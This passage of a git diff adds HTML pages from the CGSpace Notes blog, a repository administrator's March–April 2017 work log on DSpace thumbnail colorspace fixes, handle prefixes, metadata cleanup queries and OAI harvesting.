+<time datetime="2017-03-01T17:08:52+02:00">Wed Mar 01, 2017</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-03-01">2017-03-01</h2>
+<ul>
+<li>Run the 279 CIAT author corrections on CGSpace</li>
+</ul>
+<h2 id="2017-03-02">2017-03-02</h2>
+<ul>
+<li>Skype with Michael and Peter, discussing moving the CGIAR Library to CGSpace</li>
+<li>CGIAR people possibly open to moving content, redirecting library.cgiar.org to CGSpace and letting CGSpace resolve their handles</li>
+<li>They might come in at the top level in one &ldquo;CGIAR System&rdquo; community, or with several communities</li>
+<li>I need to spend a bit of time looking at the multiple handle support in DSpace and see if new content can be minted in both handles, or just one?</li>
+<li>Need to send Peter and Michael some notes about this in a few days</li>
+<li>Also, need to consider talking to Atmire about hiring them to bring ORCiD metadata to REST / OAI</li>
+<li>Filed an issue on DSpace issue tracker for the <code>filter-media</code> bug that causes it to process JPGs even when limiting to the PDF thumbnail plugin: <a href="https://jira.duraspace.org/browse/DS-3516">DS-3516</a></li>
+<li>Discovered that the ImageMagic <code>filter-media</code> plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK</li>
+<li>Interestingly, it seems DSpace 4.x&rsquo;s thumbnails were sRGB, but forcing regeneration using DSpace 5.x&rsquo;s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see <a href="https://cgspace.cgiar.org/handle/10568/51999">10568/51999</a>):</li>
+</ul>
+<pre tabindex="0"><code>$ identify ~/Desktop/alc_contrastes_desafios.jpg
+/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000
+</code></pre><ul>
+<li>This results in discolored thumbnails when compared to the original PDF, for example sRGB and CMYK:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/03/thumbnail-srgb.jpg" alt="Thumbnail in sRGB colorspace"></p>
+<p><img src="/cgspace-notes/2017/03/thumbnail-cmyk.jpg" alt="Thumbnial in CMYK colorspace"></p>
+<ul>
+<li>I filed an issue for the color space thing: <a href="https://jira.duraspace.org/browse/DS-3517">DS-3517</a></li>
+</ul>
+<h2 id="2017-03-03">2017-03-03</h2>
+<ul>
+<li>I created a patch for DS-3517 and made a pull request against upstream <code>dspace-5_x</code>: <a href="https://github.com/DSpace/DSpace/pull/1669">https://github.com/DSpace/DSpace/pull/1669</a></li>
+<li>Looks like <code>-colorspace sRGB</code> alone isn&rsquo;t enough, we need to use profiles:</li>
+</ul>
+<pre tabindex="0"><code>$ convert alc_contrastes_desafios.pdf\[0\] -profile /opt/brew/Cellar/ghostscript/9.20/share/ghostscript/9.20/iccprofiles/default_cmyk.icc -thumbnail 300x300 -flatten -profile /opt/brew/Cellar/ghostscript/9.20/share/ghostscript/9.20/iccprofiles/default_rgb.icc alc_contrastes_desafios.pdf.jpg
+</code></pre><ul>
+<li>This reads the input file, applies the CMYK profile, applies the RGB profile, then writes the file</li>
+<li>Note that you should set the first profile immediately after the input file</li>
+<li>Also, it is better to use profiles than setting <code>-colorspace</code></li>
+<li>This is a great resource describing the color stuff: <a href="http://www.imagemagick.org/Usage/formats/#profiles">http://www.imagemagick.org/Usage/formats/#profiles</a></li>
+<li>Somehow we need to detect the color system being used by the input file and handle each case differently (with profiles)</li>
+<li>This is trivial with <code>identify</code> (even by the <a href="http://im4java.sourceforge.net/api/org/im4java/core/IMOps.html#identify">Java ImageMagick API</a>):</li>
+</ul>
+<pre tabindex="0"><code>$ identify -format &#39;%r\n&#39; alc_contrastes_desafios.pdf\[0\]
+DirectClass CMYK
+$ identify -format &#39;%r\n&#39; Africa\ group\ of\ negotiators.pdf\[0\]
+DirectClass sRGB Alpha
+</code></pre><h2 id="2017-03-04">2017-03-04</h2>
+<ul>
+<li>Spent more time looking at the ImageMagick CMYK issue</li>
+<li>The <code>default_cmyk.icc</code> and <code>default_rgb.icc</code> files are both part of the Ghostscript GPL distribution, but according to DSpace&rsquo;s <code>LICENSES_THIRD_PARTY</code> file, DSpace doesn&rsquo;t allow distribution of dependencies that are licensed solely under the GPL</li>
+<li>So this issue is kinda pointless now, as the ICC profiles are absolutely necessary to make a meaningful CMYK→sRGB conversion</li>
+</ul>
+<h2 id="2017-03-05">2017-03-05</h2>
+<ul>
+<li>Look into helping developers from landportal.info with a query for items related to LAND on the REST API</li>
+<li>They want something like the items that are returned by the general &ldquo;LAND&rdquo; query in the search interface, but we cannot do that</li>
+<li>We can only return specific results for metadata fields, like:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;LAND REFORM&#34;, &#34;language&#34;: null}&#39; | json_pp
+</code></pre><ul>
+<li>But there are hundreds of combinations of fields and values (like <code>dc.subject</code> and all the center subjects), and we can&rsquo;t use wildcards in REST!</li>
+<li>Reading about enabling multiple handle prefixes in DSpace</li>
+<li>There is a mailing list thread from 2011 about it: <a href="http://dspace.2283337.n4.nabble.com/Multiple-handle-prefixes-merged-DSpace-instances-td3427192.html">http://dspace.2283337.n4.nabble.com/Multiple-handle-prefixes-merged-DSpace-instances-td3427192.html</a></li>
+<li>And a comment from Atmire&rsquo;s Bram about it on the DSpace wiki: <a href="https://wiki.lyrasis.org/display/DSDOC5x/Installing+DSpace?focusedCommentId=78163296#comment-78163296">https://wiki.lyrasis.org/display/DSDOC5x/Installing+DSpace?focusedCommentId=78163296#comment-78163296</a></li>
+<li>Bram mentions an undocumented configuration option <code>handle.plugin.checknameauthority</code>, but I noticed another one in <code>dspace.cfg</code>:</li>
+</ul>
+<pre tabindex="0"><code># List any additional prefixes that need to be managed by this handle server
+# (as for examle handle prefix coming from old dspace repository merged in
+# that repository)
+# handle.additional.prefixes = prefix1[, prefix2]
+</code></pre><ul>
+<li>Because of this I noticed that our Handle server&rsquo;s <code>config.dct</code> was potentially misconfigured!</li>
+<li>We had some default values still present:</li>
+</ul>
+<pre tabindex="0"><code>&#34;300:0.NA/YOUR_NAMING_AUTHORITY&#34;
+</code></pre><ul>
+<li>I&rsquo;ve changed them to the following and restarted the handle server:</li>
+</ul>
+<pre tabindex="0"><code>&#34;300:0.NA/10568&#34;
+</code></pre><ul>
+<li>In looking at all the configs I just noticed that we are not providing a DOI in the Google-specific metadata crosswalk</li>
+<li>From <code>dspace/config/crosswalks/google-metadata.properties</code>:</li>
+</ul>
+<pre tabindex="0"><code>google.citation_doi = cg.identifier.doi
+</code></pre><ul>
+<li>This works, and makes DSpace output the following metadata on the item view page:</li>
+</ul>
+<pre tabindex="0"><code>&lt;meta content=&#34;https://dx.doi.org/10.1186/s13059-017-1153-y&#34; name=&#34;citation_doi&#34;&gt;
+</code></pre><ul>
+<li>Submitted and merged pull request for this: <a href="https://github.com/ilri/DSpace/pull/305">https://github.com/ilri/DSpace/pull/305</a></li>
+<li>Submit pull request to set the author separator for XMLUI item lists to a semicolon instead of &ldquo;,&rdquo;: <a href="https://github.com/ilri/DSpace/pull/306">https://github.com/ilri/DSpace/pull/306</a></li>
+<li>I want to show it briefly to Abenet and Peter to get feedback</li>
+</ul>
+<h2 id="2017-03-06">2017-03-06</h2>
+<ul>
+<li>Someone on the mailing list said that <code>handle.plugin.checknameauthority</code> should be false if we&rsquo;re using multiple handle prefixes</li>
+</ul>
+<h2 id="2017-03-07">2017-03-07</h2>
+<ul>
+<li>I set up a top-level community as a test for the CGIAR Library and imported one item with the the 10947 handle prefix</li>
+<li>When testing the Handle resolver locally it shows the item to be on the local repository</li>
+<li>So this seems to work, with the following caveats:
+<ul>
+<li>New items will have the default handle</li>
+<li>Communities and collections will have the default handle</li>
+<li>Only items imported manually can have the other handles</li>
+</ul>
+</li>
+<li>I need to talk to Michael and Peter to share the news, and discuss the structure of their community(s) and try some actual test data</li>
+<li>We&rsquo;ll need to do some data cleaning to make sure they are using the same fields we are, like <code>dc.type</code> and <code>cg.identifier.status</code></li>
+<li>Another thing is that the import process creates new <code>dc.date.accessioned</code> and <code>dc.date.available</code> fields, so we end up with duplicates (is it important to preserve the originals for these?)</li>
+<li>Report DS-3520 issue to Atmire</li>
+</ul>
+<h2 id="2017-03-08">2017-03-08</h2>
+<ul>
+<li>Merge the author separator changes to <code>5_x-prod</code>, as everyone has responded positively about it, and it&rsquo;s the default in Mirage2 afterall!</li>
+<li>Cherry pick the <code>commons-collections</code> patch from DSpace&rsquo;s <code>dspace-5_x</code> branch to address DS-3520: <a href="https://jira.duraspace.org/browse/DS-3520">https://jira.duraspace.org/browse/DS-3520</a></li>
+</ul>
+<h2 id="2017-03-09">2017-03-09</h2>
+<ul>
+<li>Export list of sponsors so Peter can clean it up:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;description&#39; and qualifier = &#39;sponsorship&#39;) group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
+COPY 285
+</code></pre><h2 id="2017-03-12">2017-03-12</h2>
+<ul>
+<li>Test the sponsorship fixes and deletes from Peter:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Investors-Fix-51.csv -f dc.description.sponsorship -t Action -m 29 -d dspace -u dspace -p fuuuu
+$ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.sponsorship -m 29 -d dspace -u dspace -p fuuu
+</code></pre><ul>
+<li>Generate a new list of unique sponsors so we can update the controlled vocabulary:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;description&#39; and qualifier = &#39;sponsorship&#39;)) to /tmp/sponsorship.csv with csv;
+</code></pre><ul>
+<li>Pull request for controlled vocabulary if Peter approves: <a href="https://github.com/ilri/DSpace/pull/308">https://github.com/ilri/DSpace/pull/308</a></li>
+<li>Review Sisay&rsquo;s roots, tubers, and bananas (RTB) theme, which still needs some fixes to work properly: <a href="https://github.com/ilri/DSpace/pull/307">https://github.com/ilri/DSpace/pull/307</a></li>
+<li>Created an issue to track the progress on the Livestock CRP theme: <a href="https://github.com/ilri/DSpace/issues/309">https://github.com/ilri/DSpace/issues/309</a></li>
+<li>Created a basic theme for the Livestock CRP community</li>
+</ul>
+<p><img src="/cgspace-notes/2017/03/livestock-theme.png" alt="Livestock CRP theme"></p>
+<h2 id="2017-03-15">2017-03-15</h2>
+<ul>
+<li>Merge pull request for controlled vocabulary updates for sponsor: <a href="https://github.com/ilri/DSpace/pull/308">https://github.com/ilri/DSpace/pull/308</a></li>
+<li>Merge pull request for Livestock CRP theme: <a href="https://github.com/ilri/DSpace/issues/309">https://github.com/ilri/DSpace/issues/309</a></li>
+<li>Create pull request for PABRA subjects (waiting for confirmation from Abenet before merging): <a href="https://github.com/ilri/DSpace/pull/310">https://github.com/ilri/DSpace/pull/310</a></li>
+<li>Create pull request for CCAFS Phase II migrations (waiting for confirmation from CCAFS people): <a href="https://github.com/ilri/DSpace/pull/311">https://github.com/ilri/DSpace/pull/311</a></li>
+<li>I also need to ask if either of these new fields need to be added to Discovery facets, search, and Atmire modules</li>
+<li>Run all system updates on DSpace Test and re-deploy CGSpace</li>
+</ul>
+<h2 id="2017-03-16">2017-03-16</h2>
+<ul>
+<li>Merge pull request for PABRA subjects: <a href="https://github.com/ilri/DSpace/pull/310">https://github.com/ilri/DSpace/pull/310</a></li>
+<li>Abenet and Peter say we can add them to Discovery, Atmire modules, etc, but I might not have time to do it now</li>
+<li>Help Sisay with RTB theme again</li>
+<li>Remove ICARDA subject from Discovery sidebar facets: <a href="https://github.com/ilri/DSpace/pull/312">https://github.com/ilri/DSpace/pull/312</a></li>
+<li>Remove ICARDA subject from Browse and item submission form: <a href="https://github.com/ilri/DSpace/pull/313">https://github.com/ilri/DSpace/pull/313</a></li>
+<li>Merge the CCAFS Phase II changes but hold off on doing the flagship metadata updates until Macaroni Bros gets their importer updated</li>
+<li>Deploy latest changes and investor fixes/deletions on CGSpace</li>
+<li>Run system updates on CGSpace and reboot server</li>
+</ul>
+<h2 id="2017-03-20">2017-03-20</h2>
+<ul>
+<li>Create basic XMLUI theme for PABRA community: <a href="https://github.com/ilri/DSpace/pull/315">https://github.com/ilri/DSpace/pull/315</a></li>
+</ul>
+<h2 id="2017-03-24">2017-03-24</h2>
+<ul>
+<li>Still helping Sisay try to figure out how to create a theme for the RTB community</li>
+</ul>
+<h2 id="2017-03-28">2017-03-28</h2>
+<ul>
+<li>CCAFS said they are ready for the flagship updates for Phase II to be run (<code>cg.subject.ccafs</code>), so I ran them on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ccafs-flagships-feb7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
+</code></pre><ul>
+<li>We&rsquo;ve been waiting since February to run these</li>
+<li>Also, I generated a list of all CCAFS flagships because there are a dozen or so more than there should be:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=210 group by text_value order by count desc) to /tmp/ccafs.csv with csv;
+</code></pre><ul>
+<li>I sent a list to CCAFS people so they can tell me if some should be deleted or moved, etc</li>
+<li>Test, squash, and merge Sisay&rsquo;s RTB theme into <code>5_x-prod</code>: <a href="https://github.com/ilri/DSpace/pull/316">https://github.com/ilri/DSpace/pull/316</a></li>
+</ul>
+<h2 id="2017-03-29">2017-03-29</h2>
+<ul>
+<li>Dump a list of fields in the DC and CG schemas to compare with CG Core:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select case when metadata_schema_id=1 then &#39;dc&#39; else &#39;cg&#39; end as schema, element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
+</code></pre><ul>
+<li>Ooh, a better one!</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select coalesce(case when metadata_schema_id=1 then &#39;dc.&#39; else &#39;cg.&#39; end) || concat_ws(&#39;.&#39;, element, qualifier) as field, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
+</code></pre><h2 id="2017-03-30">2017-03-30</h2>
+<ul>
+<li>Adjust the Linode CPU usage alerts for the CGSpace server from 150% to 200%, as generally the nightly Solr indexing causes a usage around 150–190%, so this should make the alerts less regular</li>
+<li>Adjust the threshold for DSpace Test from 90 to 100%</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2017-04/index.html b/docs/2017-04/index.html
new file mode 100644
index 000000000..17862b245
--- /dev/null
+++ b/docs/2017-04/index.html
@@ -0,0 +1,639 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="April, 2017" />
+<meta property="og:description" content="2017-04-02
+
+Merge one change to CCAFS flagships that I had forgotten to remove last month (&ldquo;MANAGING CLIMATE RISK&rdquo;): https://github.com/ilri/DSpace/pull/317
+Quick proof-of-concept hack to add dc.rights to the input form, including some inline instructions/hints:
+
+
+
+Remove redundant/duplicate text in the DSpace submission license
+Testing the CMYK patch on a collection with 650 items:
+
+$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-04/" />
+<meta property="article:published_time" content="2017-04-02T17:08:52+02:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="April, 2017"/>
+<meta name="twitter:description" content="2017-04-02
+
+Merge one change to CCAFS flagships that I had forgotten to remove last month (&ldquo;MANAGING CLIMATE RISK&rdquo;): https://github.com/ilri/DSpace/pull/317
+Quick proof-of-concept hack to add dc.rights to the input form, including some inline instructions/hints:
+
+
+
+Remove redundant/duplicate text in the DSpace submission license
+Testing the CMYK patch on a collection with 650 items:
+
+$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "April, 2017",
+  "url": "https://alanorth.github.io/cgspace-notes/2017-04/",
+  "wordCount": "2917",
+  "datePublished": "2017-04-02T17:08:52+02:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2017-04/">
+
+    <title>April, 2017 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-04/">April, 2017</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2017-04-02T17:08:52+02:00">Sun Apr 02, 2017</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-04-02">2017-04-02</h2>
+<ul>
+<li>Merge one change to CCAFS flagships that I had forgotten to remove last month (&ldquo;MANAGING CLIMATE RISK&rdquo;): <a href="https://github.com/ilri/DSpace/pull/317">https://github.com/ilri/DSpace/pull/317</a></li>
+<li>Quick proof-of-concept hack to add <code>dc.rights</code> to the input form, including some inline instructions/hints:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/04/dc-rights.png" alt="dc.rights in the submission form"></p>
+<ul>
+<li>Remove redundant/duplicate text in the DSpace submission license</li>
+<li>Testing the CMYK patch on a collection with 650 items:</li>
+</ul>
+<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
+</code></pre><h2 id="2017-04-03">2017-04-03</h2>
+<ul>
+<li>Continue testing the CMYK patch on more communities:</li>
+</ul>
+<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/1 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&gt; /tmp/filter-media-cmyk.txt 2&gt;&amp;1
+</code></pre><ul>
+<li>So far there are almost 500:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c profile /tmp/filter-media-cmyk.txt
+484
+</code></pre><ul>
+<li>Looking at the CG Core document again, I&rsquo;ll send some feedback to Peter and Abenet:
+<ul>
+<li>We use cg.contributor.crp to indicate the CRP(s) affiliated with the item</li>
+<li>DSpace has dc.date.available, but this field isn&rsquo;t particularly meaningful other than as an automatic timestamp at the time of item accession (and is identical to dc.date.accessioned)</li>
+<li>dc.relation exists in CGSpace, but isn&rsquo;t used—rather dc.relation.ispartofseries, which is used ~5,000 times to Series name and number within that series</li>
+</ul>
+</li>
+<li>Also, I&rsquo;m noticing some weird outliers in <code>cg.coverage.region</code>, need to remember to go correct these later:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=227;
+</code></pre><h2 id="2017-04-04">2017-04-04</h2>
+<ul>
+<li>The <code>filter-media</code> script has been running on more large communities and now there are many more CMYK PDFs that have been fixed:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c profile /tmp/filter-media-cmyk.txt
+1584
+</code></pre><ul>
+<li>Trying to find a way to get the number of items submitted by a certain user in 2016</li>
+<li>It&rsquo;s not possible in the DSpace search / module interfaces, but might be able to be derived from <code>dc.description.provenance</code>, as that field contains the name and email of the submitter/approver, ie:</li>
+</ul>
+<pre tabindex="0"><code>Submitted by Francesca Giampieri (fgiampieri) on 2016-01-19T13:56:43Z^M
+No. of bitstreams: 1^M
+ILAC_Brief21_PMCA.pdf: 113462 bytes, checksum: 249fef468f401c066a119f5db687add0 (MD5)
+</code></pre><ul>
+<li>This SQL query returns fields that were submitted or approved by giampieri in 2016 and contain a &ldquo;checksum&rdquo; (ie, there was a bitstream in the submission):</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^(Submitted|Approved).*giampieri.*2016-.*checksum.*&#39;;
+</code></pre><ul>
+<li>Then this one does the same, but for fields that don&rsquo;t contain checksums (ie, there was no bitstream in the submission):</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^(Submitted|Approved).*giampieri.*2016-.*&#39; and text_value !~ &#39;^(Submitted|Approved).*giampieri.*2016-.*checksum.*&#39;;
+</code></pre><ul>
+<li>For some reason there seem to be way too many fields, for example there are 498 + 13 here, which is 511 items for just this one user.</li>
+<li>It looks like there can be a scenario where the user submitted AND approved it, so some records might be doubled&hellip;</li>
+<li>In that case it might just be better to see how many the user submitted (both <em>with</em> and <em>without</em> bitstreams):</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^Submitted.*giampieri.*2016-.*&#39;;
+</code></pre><h2 id="2017-04-05">2017-04-05</h2>
+<ul>
+<li>After doing a few more large communities it seems this is the final count of CMYK PDFs:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c profile /tmp/filter-media-cmyk.txt
+2505
+</code></pre><h2 id="2017-04-06">2017-04-06</h2>
+<ul>
+<li>After reading the <a href="https://wiki.lyrasis.org/display/cmtygp/DCAT+Meeting+April+2017">notes for DCAT April 2017</a> I am testing some new settings for PostgreSQL on DSpace Test:
+<ul>
+<li><code>db.maxconnections</code> 30→70 (the default PostgreSQL config allows 100 connections, so DSpace&rsquo;s default of 30 is quite low)</li>
+<li><code>db.maxwait</code> 5000→10000</li>
+<li><code>db.maxidle</code> 8→20 (DSpace default is -1, unlimited, but we had set it to 8 earlier)</li>
+</ul>
+</li>
+<li>I need to look at the Munin graphs after a few days to see if the load has changed</li>
+<li>Run system updates on DSpace Test and reboot the server</li>
+<li>Discussing harvesting CIFOR&rsquo;s DSpace via OAI</li>
+<li>Sisay added their OAI as a source to a new collection, but using the Simple Dublin Core method, so many fields are unqualified and duplicated</li>
+<li>Looking at the <a href="https://wiki.lyrasis.org/display/DSDOC5x/XMLUI+Configuration+and+Customization">documentation</a> it seems that we probably want to be using DSpace Intermediate Metadata</li>
+</ul>
+<h2 id="2017-04-10">2017-04-10</h2>
+<ul>
+<li>Adjust Linode CPU usage alerts on DSpace servers
+<ul>
+<li>CGSpace from 200 to 250%</li>
+<li>DSpace Test from 100 to 150%</li>
+</ul>
+</li>
+<li>Remove James from Linode access</li>
+<li>Look into having CIFOR use a sub prefix of 10568 like 10568.01</li>
+<li>Handle.net calls this <a href="https://www.handle.net/faq.html#4">&ldquo;derived prefixes&rdquo;</a> and it seems this would work with DSpace if we wanted to go that route</li>
+<li>CIFOR is starting to test aligning their metadata more with CGSpace/CG core</li>
+<li>They shared a <a href="https://data.cifor.org/dspace/xmlui/handle/11463/947?show=full">test item</a> which is using <code>cg.coverage.country</code>, <code>cg.subject.cifor</code>, <code>dc.subject</code>, and <code>dc.date.issued</code></li>
+<li>Looking at their OAI I&rsquo;m not sure it has updated as I don&rsquo;t see the new fields: <a href="https://data.cifor.org/dspace/oai/request?verb=ListRecords&amp;resumptionToken=oai_dc///col_11463_6/900">https://data.cifor.org/dspace/oai/request?verb=ListRecords&amp;resumptionToken=oai_dc///col_11463_6/900</a></li>
+<li>Maybe they need to make sure they are running the OAI cache refresh cron job, or maybe OAI doesn&rsquo;t export these?</li>
+<li>I added <code>cg.subject.cifor</code> to the metadata registry and I&rsquo;m waiting for the harvester to re-harvest to see if it picks up more data now</li>
+<li>Another possiblity is that we could use a cross walk&hellip; but I&rsquo;ve never done it.</li>
+</ul>
+<h2 id="2017-04-11">2017-04-11</h2>
+<ul>
+<li>Looking at the item from CIFOR it hasn&rsquo;t been updated yet, maybe they aren&rsquo;t running the cron job</li>
+<li>I emailed Usman from CIFOR to ask if he&rsquo;s running the cron job</li>
+</ul>
+<h2 id="2017-04-12">2017-04-12</h2>
+<ul>
+<li>CIFOR says they have cleaned their OAI cache and that the cron job for OAI import is enabled</li>
+<li>Now I see updated fields, like <code>dc.date.issued</code> but none from the CG or CIFOR namespaces</li>
+<li>Also, DSpace Test hasn&rsquo;t re-harvested this item yet, so I will wait one more day before forcing a re-harvest</li>
+<li>Looking at CIFOR&rsquo;s OAI using different metadata formats, like qualified Dublin Core and DSpace Intermediate Metadata:
+<ul>
+<li>QDC: <a href="https://data.cifor.org/dspace/oai/request?verb=ListRecords&amp;resumptionToken=qdc///col_11463_6/900">https://data.cifor.org/dspace/oai/request?verb=ListRecords&amp;resumptionToken=qdc///col_11463_6/900</a></li>
+<li>DIM: <a href="https://data.cifor.org/dspace/oai/request?verb=ListRecords&amp;resumptionToken=dim///col_11463_6/900">https://data.cifor.org/dspace/oai/request?verb=ListRecords&amp;resumptionToken=dim///col_11463_6/900</a></li>
+</ul>
+</li>
+<li>Looking at one of CGSpace&rsquo;s items in OAI it doesn&rsquo;t seem that metadata fields other than those in the DC schema are exported:
+<ul>
+<li><a href="https://cgspace.cgiar.org/handle/10568/33346?show=full">https://cgspace.cgiar.org/handle/10568/33346?show=full</a></li>
+<li><a href="https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;metadataPrefix=dim&amp;set=col_10568_68619">https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;metadataPrefix=dim&amp;set=col_10568_68619</a></li>
+</ul>
+</li>
+<li>Side note: WTF, I just saw an item on CGSpace&rsquo;s OAI that is using <code>dc.cplace.country</code> and <code>dc.rplace.region</code>, which we stopped using in 2016 after the metadata migrations:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/04/cplace.png" alt="stale metadata in OAI"></p>
+<ul>
+<li>The particular item is <a href="http://hdl.handle.net/10568/6">10568/6</a> and, for what it&rsquo;s worth, the stale metadata only appears in the OAI view:
+<ul>
+<li>XMLUI: <a href="https://cgspace.cgiar.org/handle/10568/6?show=full">https://cgspace.cgiar.org/handle/10568/6?show=full</a></li>
